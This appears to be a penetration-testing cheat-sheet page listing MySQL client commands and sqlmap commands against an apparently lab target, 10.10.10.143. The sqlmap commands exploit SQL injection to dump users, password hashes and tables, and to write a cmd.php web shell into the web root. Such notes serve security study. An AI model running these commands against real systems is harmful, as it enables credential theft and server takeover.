SQL

MYSQL

mysql -u $USER -p $PASS -h $IP

to get the query result in vertical

FROM $TABLE\G

to dump the sql

mysqldump -u $USER -p#PASS $DB > $OUTPUT_backup.sql

SQLMAP

sqlmap -u http://10.10.10.143/room.php?cod=1

for user and pass

sqlmap -u http://10.10.10.143/room.php?cod=1 --users --passwords

file upload

sqlmap -u http://10.10.10.143/room.php?cod=1 --file-write cmd.php --file-dest /var/www/html/cmd.php

Via response.txt

sqlmap -r sqli.txt --dbms=mysql 
sqlmap -r sqli.txt --dbms=mysql --dbs
sqlmap -r sqli.txt --dbms=mysql -D status --tables
sqlmap -r sqli.txt --dbms=mysql --dump -T users

PreviousWordpress NextGitea

Last updated 4 months ago